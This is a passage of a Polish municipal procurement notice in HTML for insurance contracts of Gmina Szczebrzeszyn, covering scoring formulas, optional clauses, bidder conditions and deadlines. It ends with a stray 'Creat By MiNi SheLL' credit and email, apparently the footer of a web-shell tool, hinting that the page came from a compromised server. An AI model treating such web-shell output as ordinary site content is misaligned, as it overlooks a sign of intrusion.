postanowienia szczególne fakultatywne”<br/>Imp – liczba „małych” punktów przyznanych ocenianej ofercie za przyjęte klauzule dodatkowe i inne postanowienia szczególne fakultatywne<br/>Kp – współczynnik proporcjonalności = 100<br/>Wk – waga procentowa dla kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne” = 10%<br/>21.3.2.3.	Wykaz klauzul dodatkowych i innych postanowień szczególnych fakultatywnych dotyczących II części zamówienia<br/>	Uznanie za szkodę częściową uszkodzenie ubezpieczonego pojazdu w takim zakresie, <br/>że koszt jego naprawy nie przekracza 80% jego wartości rynkowej na dzień ustalania odszkodowania – 20 punktów<br/>	Przyjęcie podanej klauzuli szkody całkowitej – 20 punktów<br/>	Przyjęcie odpowiedzialności za szkody z ubezpieczenia auto casco powstałe podczas kierowania pojazdem w stanie nietrzeźwości albo po spożyciu alkoholu, lub pod wpływem środków odurzających, substancji psychotropowych lub środków zastępczych w rozumieniu przepisów o przeciwdziałaniu narkomanii – 10 punktów<br/>	Przyjęcie gwarantowanej sumy ubezpieczenia auto casco przez każdy roczny okres ubezpieczenia pojazdów – 20 punktów<br/>	Przyjęcie podanej klauzuli ubezpieczenia pojazdu niezabezpieczonego – 20 punktów<br/>	Przyjęcie podanej klauzuli funduszu prewencyjnego – 10 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe i inne postanowienia szczególne fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.3.	Część III: Ubezpieczenie następstw nieszczęśliwych wypadków członków Ochotniczych Straży Pożarnych Gminy Szczebrzeszyn. Zakres ubezpieczenia obejmuje:<br/>1)	ubezpieczenie bezimienne członków Ochotniczych Straży Pożarnych i Młodzieżowych Drużyn Pożarniczych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-05-01 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.2.2.	Część III zamówienia<br/>1)	cena - 90%<br/>2)	klauzule dodatkowe i inne postanowienia szczególne fakultatywne - 10%<br/><br/>21.3.3.	Część III zamówienia<br/>21.3.3.1.	Kryterium „Cena”<br/>Maksymalną liczbę punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Liczba punktów w kryterium „Cena” zostanie obliczona zgodnie ze wzorem:<br/>	Cena najtańszej ważnej oferty <br/>Cn =	----------------------------------------	× Kp	× Wc<br/>	Cena oferty badanej <br/>gdzie:<br/>Cn – liczba punktów w kryterium „Cena”<br/>Kp – współczynnik proporcjonalności = 100<br/>Wc – waga procentowa dla kryterium „Cena” = 90%<br/>21.3.3.2.	Kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”<br/>Ocena ofert w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”, zostanie dokonana na podstawie formularza zawartego w złożonej ofercie, z przyznaniem ocenianej ofercie „małych” punktów, określonych przy poszczególnych klauzulach podanych poniżej. Punkty „małe” za warunki pośrednie (zmodyfikowane przez wykonawców) nie będą przyznawane.<br/>Maksymalną liczbę „małych” punktów (100 pkt), otrzyma oferta tego wykonawcy, który przyjmie wszystkie klauzule dodatkowe i inne postanowienia szczególne fakultatywne, <br/>a pozostałe oferty otrzymają odpowiednio mniej punktów, w zależności od przyjętych klauzul i postanowień. Liczba punktów w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne” zostanie obliczona zgodnie ze wzorem:<br/>	Imp <br/>Pp =	----------------------------------	× Kp	× Wk<br/>	100 pkt <br/>gdzie: <br/>Pp – liczba punktów w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”<br/>Imp – liczba „małych” punktów przyznanych ocenianej ofercie za przyjęte klauzule dodatkowe i inne postanowienia szczególne fakultatywne<br/>Kp – współczynnik proporcjonalności = 100<br/>Wk – waga procentowa dla kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne” = 10%<br/>21.3.3.3.	Wykaz klauzul dodatkowych i innych postanowień szczególnych fakultatywnych dotyczących III części zamówienia<br/>	Przy doznaniu przez ubezpieczonego trwałego uszczerbku na zdrowiu przekraczającego 25%, wypłata odszkodowania w procencie sumy ubezpieczenia odpowiadającym dwukrotności doznanego uszczerbku na zdrowiu – tzw. progresywne ustalanie odszkodowania – 25 punktów<br/>	Zwiększenie świadczenia dodatkowego z tytułu pobytu ubezpieczonego w szpitalu, będącego następstwem nieszczęśliwego wypadku objętego zakresem i umową ubezpieczenia do kwoty 100,00 zł za każdy dzień pobytu licząc od 3 dnia pobytu przez okres maksymalnie 90 dni w trakcie rocznego okresu ubezpieczenia – 25 punktów<br/>	Wypłata jednorazowego świadczenia w przypadku braku trwałego uszczerbku na zdrowiu <br/>w wysokości 5% sumy ubezpieczenia – 25 punktów<br/>	Przyjęcie podanej klauzuli funduszu prewencyjnego – 25 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe i inne postanowienia szczególne fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.4.	Część IV: Ubezpieczenie instalacji solarnych i fotowoltaicznych zainstalowanych na terenie Gminy Szczebrzeszyn. Zakres ubezpieczenia obejmuje:<br/>1)	ubezpieczenie mienia od wszystkich ryzyk. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66515100-4 - Usługi ubezpieczenia od ognia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-05-01 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.2.2.	Część IV zamówienia<br/>1)	cena - 90%<br/>2)	klauzule dodatkowe i inne postanowienia szczególne fakultatywne - 10%<br/><br/>Część IV zamówienia<br/>21.3.4.1. Kryterium „Cena”<br/>Maksymalną liczbę punktów w kryterium „Cena” otrzyma oferta z najniższą ceną. Liczba punktów w kryterium „Cena” zostanie obliczona zgodnie ze wzorem:<br/>	Cena najtańszej ważnej oferty <br/>Cn =	----------------------------------------	× Kp	× Wc<br/>	Cena oferty badanej <br/>gdzie:<br/>Cn – liczba punktów w kryterium „Cena”<br/>Kp – współczynnik proporcjonalności = 100<br/>Wc – waga procentowa dla kryterium „Cena” = 90%<br/><br/>21.3.4.2.	Kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”<br/>Ocena ofert w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”, zostanie dokonana na podstawie formularza zawartego w złożonej ofercie, z przyznaniem ocenianej ofercie „małych” punktów, określonych przy poszczególnych klauzulach podanych poniżej. Punkty „małe” za warunki pośrednie (zmodyfikowane przez wykonawców) nie będą przyznawane. Maksymalną liczbę „małych” punktów (100 pkt), otrzyma oferta tego wykonawcy, który przyjmie wszystkie klauzule dodatkowe i inne postanowienia szczególne fakultatywne, a pozostałe oferty otrzymają odpowiednio mniej punktów, w zależności od przyjętych klauzul i postanowień. Liczba punktów w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne” zostanie obliczona zgodnie ze wzorem:<br/> Imp <br/>Pp =	----------------------------------	× Kp	× Wk<br/> 100 pkt <br/>gdzie: <br/>Pp – liczba punktów w kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne”<br/>Imp – liczba „małych” punktów przyznanych ocenianej ofercie za przyjęte klauzule dodatkowe i inne postanowienia szczególne fakultatywne<br/>Kp – współczynnik proporcjonalności = 100<br/>Wk – waga procentowa dla kryterium „Klauzule dodatkowe i inne postanowienia szczególne fakultatywne” = 10%<br/>21.3.4.3.	Wykaz klauzul dodatkowych i innych postanowień szczególnych fakultatywnych dotyczących IV części zamówienia<br/>- Przyjęcie podanej klauzuli uznania okoliczności – 10 punktów<br/>- Przyjęcie podanej klauzuli zmiany wielkości ryzyka – 10 punktów<br/>- Przyjęcie podanej klauzuli wypłaty bezspornej części odszkodowania – 10 punktów<br/>- Przyjęcie podanej klauzuli funduszu prewencyjnego – 10 punktów<br/>- Zniesienie franszyzy integralnej – 30 punktów<br/>- Zniesienie franszyzy redukcyjnej dla ryzyk gradu i powodzi – 30 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule dodatkowe i inne postanowienia szczególne fakultatywne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1.	O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>7.1.1.	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 u.p.z.p.;<br/>7.1.2.	spełniają warunki udziału w postępowaniu, określone w art. 112 ust. 2 pkt 2 i w art. 114 u.p.z.p., dotyczące posiadania odpowiedniego zezwolenia, licencji, koncesji lub wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia usług ubezpieczeniowych w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.<br/>7.2.	Zamawiający nie określa innych warunków udziału w postępowaniu, niż wymienione w punkcie poprzedzającym.<br/>7.3.	Zgodnie z art. 58 ust. 1 u.p.z.p. wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>7.3.1.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia <br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>7.3.2.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7.3.3.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawo¬do¬wej, o którym mowa w art. 112 ust. 2 pkt 2 u.p.z.p. jest spełniony, jeżeli co najmniej jeden <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia <br/>do prowa¬dze¬nia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, <br/>do których realizacji te uprawnienia są wymagane.<br/>7.3.4.	W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>7.4.	Zgodnie z art. 118 ust. 1 u.p.z.p., wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Z uwagi jednak na nieokre¬ślenie przez zamawiającego warunków udziału w postępowaniu, dotyczących sytuacji ekono¬micznej <br/>lub finansowej oraz zdolności technicznych lub zawodowych, przepis art. 118 u.p.z.p. nie ma <br/>w niniejszym postępowaniu zastosowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Załączniki nr: 4; 4a; 4b; 4c Projektowane postanowienia umowy dotyczące każdej części zawierają informacje o zmianach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wnioskodawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnegp na ePUAP i udostępnionego na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com